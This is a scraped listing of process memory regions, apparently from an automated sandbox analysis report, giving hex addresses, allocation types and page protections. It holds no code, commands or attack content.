trusted library allocation
|
page read and write
|
||
30B4000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3E0000
|
direct allocation
|
page read and write
|
||
3AE8000
|
heap
|
page read and write
|
||
22A000
|
heap
|
page read and write
|
||
7FE89BE9000
|
trusted library allocation
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
3BE0000
|
direct allocation
|
page read and write
|
||
4209000
|
heap
|
page read and write
|
||
247E000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
4779000
|
heap
|
page read and write
|
||
4CF000
|
heap
|
page read and write
|
||
2405000
|
trusted library allocation
|
page read and write
|
||
312B000
|
heap
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
2B4A000
|
trusted library allocation
|
page read and write
|
||
1BF7B000
|
stack
|
page read and write
|
||
3598000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
3180000
|
heap
|
page read and write
|
||
3D0000
|
direct allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
43A9000
|
heap
|
page read and write
|
||
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
3AEE000
|
heap
|
page read and write
|
||
758000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
58D2000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
30E8000
|
heap
|
page read and write
|
||
1AE40000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
3E60000
|
direct allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
2B49000
|
trusted library allocation
|
page read and write
|
||
3615000
|
heap
|
page read and write
|
||
3C00000
|
direct allocation
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
4913000
|
heap
|
page read and write
|
||
7FE8B340000
|
trusted library allocation
|
page read and write
|
||
1A858000
|
stack
|
page read and write
|
||
2444000
|
trusted library allocation
|
page read and write
|
||
7FFFFF83000
|
trusted library allocation
|
page execute read
|
||
3B6D000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
374F000
|
heap
|
page read and write
|
||
317B000
|
trusted library allocation
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
365F000
|
stack
|
page read and write
|
||
1A7E9000
|
stack
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3AF0000
|
direct allocation
|
page read and write
|
||
3F60000
|
direct allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
1AEFF000
|
stack
|
page read and write
|
||
D1E000
|
stack
|
page read and write
|
||
1A6000
|
trusted library allocation
|
page execute and read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
408C000
|
heap
|
page read and write
|
||
2577000
|
trusted library allocation
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
1A85F000
|
stack
|
page read and write
|
||
1AF00000
|
heap
|
page read and write
|
||
4DE000
|
heap
|
page read and write
|
||
1C3000
|
heap
|
page read and write
|
||
4F1000
|
heap
|
page read and write
|
||
374A000
|
heap
|
page read and write
|
||
25FA000
|
trusted library allocation
|
page read and write
|
||
26A7000
|
trusted library allocation
|
page read and write
|
||
3430000
|
trusted library allocation
|
page read and write
|
||
2680000
|
remote allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
7FE8B480000
|
trusted library allocation
|
page read and write
|
||
41BF000
|
heap
|
page read and write
|
||
2495000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
1D70000
|
direct allocation
|
page read and write
|
||
2B6E000
|
trusted library allocation
|
page read and write
|
||
1ACBF000
|
heap
|
page read and write
|
||
27A9000
|
trusted library allocation
|
page read and write
|
||
2A1F000
|
trusted library allocation
|
page read and write
|
||
1B06000
|
heap
|
page read and write
|
||
378000
|
stack
|
page read and write
|
||
7FFFFF84000
|
trusted library allocation
|
page readonly
|
||
3B6D000
|
heap
|
page read and write
|
||
40A1000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
263D000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
50DD000
|
stack
|
page read and write
|
||
4769000
|
heap
|
page read and write
|
||
4944000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
409000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
404D000
|
heap
|
page read and write
|
||
2563000
|
trusted library allocation
|
page read and write
|
||
3BB0000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
33E6000
|
trusted library allocation
|
page read and write
|
||
260000
|
trusted library allocation
|
page read and write
|
||
33BF000
|
stack
|
page read and write
|
||
427000
|
heap
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
30B6000
|
heap
|
page read and write
|
||
4913000
|
heap
|
page read and write
|
||
1B255000
|
heap
|
page read and write
|
||
2839000
|
trusted library allocation
|
page read and write
|
||
3D50000
|
trusted library allocation
|
page read and write
|
||
174000
|
heap
|
page read and write
|
||
1A5DA000
|
heap
|
page read and write
|
||
4C0000
|
trusted library allocation
|
page execute and read and write
|
||
361D000
|
heap
|
page read and write
|
||
2EB0000
|
trusted library allocation
|
page read and write
|
||
313F000
|
heap
|
page read and write
|
||
359F000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
339E000
|
stack
|
page read and write
|
||
1C10C000
|
stack
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
5BAE000
|
stack
|
page read and write
|
||
57AB000
|
heap
|
page read and write
|
||
722000
|
heap
|
page read and write
|
||
3BF7000
|
direct allocation
|
page read and write
|
||
4ACE000
|
stack
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
415000
|
heap
|
page read and write
|
||
1C329000
|
heap
|
page read and write
|
||
124D0000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
4480000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
30B6000
|
heap
|
page read and write
|
||
4777000
|
heap
|
page read and write
|
||
73A000
|
heap
|
page read and write
|
||
57C3000
|
heap
|
page read and write
|
||
56DE000
|
stack
|
page read and write
|
||
16C000
|
heap
|
page read and write
|
||
5AF0000
|
heap
|
page read and write
|
||
3AEF000
|
heap
|
page read and write
|
||
1A62F000
|
heap
|
page read and write
|
||
405F000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
40B3000
|
heap
|
page read and write
|
||
4777000
|
heap
|
page read and write
|
||
2E4000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
7FE8B2C0000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
40A7000
|
heap
|
page read and write
|
||
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
58AF000
|
heap
|
page read and write
|
||
340A000
|
trusted library allocation
|
page read and write
|
||
5B2000
|
heap
|
page read and write
|
||
2268000
|
heap
|
page execute and read and write
|
||
361D000
|
heap
|
page read and write
|
||
1E14000
|
heap
|
page read and write
|
||
482000
|
unkown
|
page readonly
|
||
290F000
|
stack
|
page read and write
|
||
439E000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
2B52000
|
trusted library allocation
|
page read and write
|
||
40A9000
|
heap
|
page read and write
|
||
480D000
|
stack
|
page read and write
|
||
4165000
|
heap
|
page read and write
|
||
1C910000
|
heap
|
page read and write
|
||
44E0000
|
trusted library allocation
|
page read and write
|
||
5706000
|
heap
|
page read and write
|
||
7FE8B324000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
468000
|
heap
|
page read and write
|
||
49AD000
|
heap
|
page read and write
|
||
4740000
|
heap
|
page read and write
|
||
27C5000
|
trusted library allocation
|
page read and write
|
||
1B5000
|
trusted library allocation
|
page execute and read and write
|
||
44DA000
|
heap
|
page read and write
|
||
4740000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
57DA000
|
heap
|
page read and write
|
||
4093000
|
heap
|
page read and write
|
||
3598000
|
heap
|
page read and write
|
||
4D8000
|
heap
|
page read and write
|
||
3BB5000
|
trusted library allocation
|
page read and write
|
||
490000
|
unkown
|
page write copy
|
||
361D000
|
heap
|
page read and write
|
||
7FE8B124000
|
trusted library allocation
|
page read and write
|
||
30B4000
|
heap
|
page read and write
|
||
33E4000
|
trusted library allocation
|
page read and write
|
||
3B65000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
F4E000
|
stack
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
4062000
|
heap
|
page read and write
|
||
1C2D1000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
3E60000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
448B000
|
heap
|
page read and write
|
||
7FE8B1DC000
|
trusted library allocation
|
page execute and read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
1DB0000
|
direct allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2B6E000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
41FD000
|
heap
|
page read and write
|
||
3AD000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
423000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
427000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
18D000
|
heap
|
page read and write
|
||
330000
|
heap
|
page read and write
|
||
4530000
|
heap
|
page read and write
|
||
305C000
|
heap
|
page read and write
|
||
478000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
39DA000
|
direct allocation
|
page read and write
|
||
1AA000
|
trusted library allocation
|
page execute and read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
588B000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
39B000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
30B4000
|
heap
|
page read and write
|
||
62A000
|
heap
|
page read and write
|
||
40A3000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
56ED000
|
stack
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2696000
|
trusted library allocation
|
page read and write
|
||
2433000
|
trusted library allocation
|
page read and write
|
||
33D0000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3745000
|
heap
|
page read and write
|
||
420B000
|
heap
|
page read and write
|
||
4209000
|
heap
|
page read and write
|
||
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
7FE8B240000
|
trusted library allocation
|
page execute and read and write
|
||
1AC00000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
30D1000
|
heap
|
page read and write
|
||
1C23E000
|
stack
|
page read and write
|
||
373000
|
direct allocation
|
page read and write
|
||
47B000
|
heap
|
page read and write
|
||
7FE89A40000
|
trusted library allocation
|
page execute and read and write
|
||
2E80000
|
heap
|
page read and write
|
||
495A000
|
heap
|
page read and write
|
||
7FE899A0000
|
trusted library allocation
|
page execute and read and write
|
||
1B54F000
|
stack
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
585C000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
390000
|
direct allocation
|
page read and write
|
||
7FE8B3E0000
|
trusted library allocation
|
page read and write
|
||
427000
|
heap
|
page read and write
|
||
451000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
2AB000
|
trusted library allocation
|
page execute and read and write
|
||
41C3000
|
heap
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
4AE000
|
heap
|
page read and write
|
||
664000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
7FE89884000
|
trusted library allocation
|
page read and write
|
||
3091000
|
heap
|
page read and write
|
||
4096000
|
heap
|
page read and write
|
||
439000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
21C0000
|
heap
|
page read and write
|
||
4DF000
|
heap
|
page read and write
|
||
4062000
|
heap
|
page read and write
|
||
43B000
|
heap
|
page read and write
|
||
374C000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
1C9FB000
|
stack
|
page read and write
|
||
27AB000
|
trusted library allocation
|
page read and write
|
||
7FE8B1D6000
|
trusted library allocation
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
2F10000
|
trusted library allocation
|
page read and write
|
||
275B000
|
trusted library allocation
|
page read and write
|
||
3AEA000
|
heap
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
312F000
|
heap
|
page read and write
|
||
3AE8000
|
heap
|
page read and write
|
||
1A6F9000
|
stack
|
page read and write
|
||
40A7000
|
heap
|
page read and write
|
||
4740000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
21C0000
|
heap
|
page read and write
|
||
2B4B000
|
trusted library allocation
|
page read and write
|
||
3BB0000
|
trusted library allocation
|
page read and write
|
||
382D000
|
heap
|
page read and write
|
||
43EE000
|
stack
|
page read and write
|
||
12361000
|
trusted library allocation
|
page read and write
|
||
423000
|
heap
|
page read and write
|
||
3F57000
|
direct allocation
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
382D000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
4946000
|
heap
|
page read and write
|
||
4E30000
|
heap
|
page read and write
|
||
41C2000
|
heap
|
page read and write
|
||
3B00000
|
direct allocation
|
page read and write
|
||
1C10000
|
trusted library allocation
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
43A6000
|
heap
|
page read and write
|
||
27A9000
|
trusted library allocation
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
47C000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
3D50000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
4063000
|
heap
|
page read and write
|
||
4F4E000
|
stack
|
page read and write
|
||
40AD000
|
heap
|
page read and write
|
||
2B68000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
488000
|
heap
|
page read and write
|
||
4094000
|
heap
|
page read and write
|
||
1AE3E000
|
stack
|
page read and write
|
||
4090000
|
heap
|
page read and write
|
||
40AB000
|
heap
|
page read and write
|
||
39DA000
|
direct allocation
|
page read and write
|
||
382D000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
5B6E000
|
stack
|
page read and write
|
||
1B380000
|
heap
|
page read and write
|
||
7FE8B122000
|
trusted library allocation
|
page read and write
|
||
3160000
|
trusted library allocation
|
page read and write
|
There are 2298 hidden memdumps, click here to show them.